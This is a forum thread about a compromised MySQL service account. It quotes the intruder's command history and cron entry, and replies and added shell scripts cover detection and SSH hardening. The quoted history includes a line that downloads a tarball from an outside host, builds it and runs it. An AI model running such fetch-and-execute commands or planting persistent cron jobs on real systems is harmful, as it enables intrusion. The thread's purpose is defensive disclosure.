This is a discussion on mysql scammer within the MySQL Database forums, part of the Database Forums category.
Just noticed some clown logged into my mysql account and set up a cron job to do some sneaky IRC stuff. Here's what he did:

Logged in:
mysql pts/0 acb45939.ipt.aol Thu Mar 8 09:00 - 09:01 (00:01)

Then ran these commands:
30 w
31 uname -a
32 passwd
33 ls -a
34 wget www.freewebtown.com/gavana123/rr.tgz ;tar xzvf rr.tgz ;rm - rf rr.tgz ;cd " web " ;./configure
35 ./fuck
36 ./go
37 ps aux
38 passwd
39 exit

This started a cron job that did some IRC stuff every minute. This was just a toy machine, so I'm not worried about it, but wanted to let others know this junk is out there.

Look for a " web " directory in ~mysql, check /var/log/messages for a lot of cron junk like this:

Mar 12 04:59:01 localhost crond[25028]: (mysql) CMD (/var/lib/mysql/ web /y2kupdate >/dev/null 2>&1)

In /var/spool/cron:

* * * * * /var/lib/mysql/ web /y2kupdate >/dev/null 2>&1
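The indicators the post lists (crond entries running jobs as the mysql account, a crontab for that account under /var/spool/cron, and an oddly named directory in the account's home) can be checked with a small POSIX shell script. This is an added example, not part of the original post: apart from the crond line quoted above, the sample log lines are constructed, and the list of service accounts that should never own cron jobs is an assumption to adjust per site.

```shell
#!/bin/sh
# Constructed sample of /var/log/messages lines. Only the two "(mysql) CMD" lines
# follow the shape quoted in the post; the others are filler to make the filter work.
SAMPLE_LOG='Mar 12 04:58:01 localhost crond[25010]: (root) CMD (run-parts /etc/cron.hourly)
Mar 12 04:59:01 localhost crond[25028]: (mysql) CMD (/var/lib/mysql/ web /y2kupdate >/dev/null 2>&1)
Mar 12 05:00:01 localhost crond[25031]: (mysql) CMD (/var/lib/mysql/ web /y2kupdate >/dev/null 2>&1)
Mar 12 05:00:05 localhost sshd[25040]: Accepted publickey for alice from 192.0.2.10 port 50022 ssh2'

# Accounts that should never be running cron jobs (assumption: adjust to your site).
SERVICE_ACCOUNTS='mysql apache nobody postgres'

# Print crond lines whose job ran as one of the service accounts.
# Usage: printf '%s\n' "$log_text" | service_cron_lines
service_cron_lines() {
    grep -E 'crond\[[0-9]+\]: \([^)]+\) CMD' | while IFS= read -r line; do
        # crond logs the account as "(user) CMD (...)"; pull the user out.
        user=$(printf '%s\n' "$line" | sed -E 's/.*crond\[[0-9]+\]: \(([^)]+)\) CMD.*/\1/')
        case " $SERVICE_ACCOUNTS " in
            *" $user "*) printf '%s\n' "$line" ;;
        esac
    done
    return 0
}

# Number of distinct commands service accounts ran from cron in the sample.
count_service_cron_cmds() {
    printf '%s\n' "$SAMPLE_LOG" | service_cron_lines \
        | sed -E 's/.*CMD \((.*)\)$/\1/' | sort -u | wc -l | tr -d ' '
}

# Live checks for a real host, following the post's advice (run as root).
# Not exercised by the sample above.
check_host_cron() {
    for svc in $SERVICE_ACCOUNTS; do
        [ -f "/var/spool/cron/$svc" ] && echo "crontab present for service account: $svc"
        home=$(awk -F: -v u="$svc" '$1==u {print $6}' /etc/passwd)
        # Directory names containing spaces (like the " web " dir in the post) are a hiding place.
        [ -n "$home" ] && [ -d "$home" ] && find "$home" -maxdepth 1 -type d -name '* *' -print
    done
    return 0
}

printf '%s\n' "$SAMPLE_LOG" | service_cron_lines
echo "distinct service-account cron commands: $(count_service_cron_cmds)"
```

On a real box, run `check_host_cron` as root and pipe `/var/log/messages` into `service_cron_lines`; a service account such as mysql appearing in crond output at all is the signal, since it has no legitimate reason to own a crontab.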
> Just noticed some clown logged into my mysql account and set up a cron
> job to do some sneaky IRC stuff. Here's what he did:
>
> Logged in:
> mysql pts/0 acb45939.ipt.aol Thu Mar 8 09:00 - 09:01 (00:01)

MySQL has a shell? Forgive my ignorance, as I am not a Linux or Unix guru, but I would not suspect that you could actually log in as mysql with a shell and fool around...

--
Willem Bogaerts
Application smith
Kratz B.V.
http://www.kratz.nl/
Willem Bogaerts wrote:
> MySQL has a shell? Forgive my ignorance, as I am not a linux or unix
> guru, but I would not suspect that you could actually log in as mysql
> with a shell and fool around...

Being paranoid, I just checked a couple of systems here. I found one mysql account on a RedHat 9 box, with a password of mysql, and a valid shell. rpm -q mysql says "mysql-3.23.41-1".

Password and shell zapped; I wonder what/whose system I just broke.... (It was on some other user's old support system.)

That particular machine is not connected to the internet, but if that is the default configuration, there are probably thousands out there.

Clues for the clueless:

If you allow telnet access to your machine, you're insane.
If you allow SSH access to your machine, using passwords, you're insane.

SSH, if configured to allow connections from outside, should permit access only via public/secret keys. That usually means the following in /etc/sshd.conf:

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no

followed by some ssh-keygen -t rsa on the clients, some copying of .pub files into lines in ~user/.ssh/authorized_keys, appropriate permissions set on .ssh and .ssh/authorized_keys, and possibly moving the SSH port to somewhere else to avoid the log-file-filling brute force password attacks that happen from time to time (they won't succeed, but they waste bandwidth and log space).

(And of course, you need to keep your SSH install up-to-date, as there are some very hairy security problems in not-too-distant earlier releases.)
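The sshd settings and key-installation steps in the reply above can be audited and applied with a short POSIX shell script. This is an added example, not part of the original post. It assumes the configuration file lives at /etc/ssh/sshd_config (the post writes /etc/sshd.conf), that absent keywords take sshd's compiled-in defaults (PasswordAuthentication yes, PubkeyAuthentication yes, Port 22), and that the first occurrence of a keyword in the file is the effective one, which is how sshd reads it. The two config fragments are constructed, one weak and one following the post's advice.

```shell
#!/bin/sh
# Constructed sshd_config fragments: the first is what the post warns against,
# the second follows its advice (key-only auth, moved port).
WEAK_CONFIG='Port 22
PasswordAuthentication yes
PubkeyAuthentication yes'

HARDENED_CONFIG='Port 2222
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no'

# Effective value of one sshd_config keyword read from stdin.
# sshd uses the first occurrence, so stop at the first match; keywords are case-insensitive.
# Usage: printf '%s\n' "$config" | sshd_value PasswordAuthentication
sshd_value() {
    awk -v k="$1" 'tolower($1)==tolower(k) {print $2; exit}'
}

# Print one line per setting that contradicts the post's advice; reads the config from stdin.
# Defaults applied for absent keywords are sshd's own (assumption noted in the lead-in).
sshd_findings() {
    cfg=$(cat)
    pw=$(printf '%s\n' "$cfg" | sshd_value PasswordAuthentication)
    pk=$(printf '%s\n' "$cfg" | sshd_value PubkeyAuthentication)
    port=$(printf '%s\n' "$cfg" | sshd_value Port)
    [ "${pw:-yes}" = "no" ]  || echo "PasswordAuthentication is effectively yes: password guessing possible"
    [ "${pk:-yes}" = "yes" ] || echo "PubkeyAuthentication is not yes: key-only login impossible"
    [ "${port:-22}" != "22" ] || echo "sshd listens on 22: expect log-filling brute-force noise"
    return 0
}

# Number of findings for a config given as a string.
count_findings() {
    printf '%s\n' "$1" | sshd_findings | wc -l | tr -d ' '
}

# Client side, as the post describes: generate an RSA key and install the public half
# on the server with tight permissions on .ssh and authorized_keys.
# Not run by the samples above; $1 is the remote user, $2 the host (hypothetical values).
install_key() {
    user=$1; host=$2
    [ -f "$HOME/.ssh/id_rsa" ] || ssh-keygen -t rsa -f "$HOME/.ssh/id_rsa"
    ssh "$user@$host" 'umask 077; mkdir -p ~/.ssh; cat >> ~/.ssh/authorized_keys;
                       chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys' \
        < "$HOME/.ssh/id_rsa.pub"
}

echo "weak config findings:";     printf '%s\n' "$WEAK_CONFIG" | sshd_findings
echo "hardened config findings:"; printf '%s\n' "$HARDENED_CONFIG" | sshd_findings
```

To audit a live server, feed the real file in with `sshd_findings < /etc/ssh/sshd_config`; only install the key and then flip PasswordAuthentication to no, in that order, so an open session is never the only way back in.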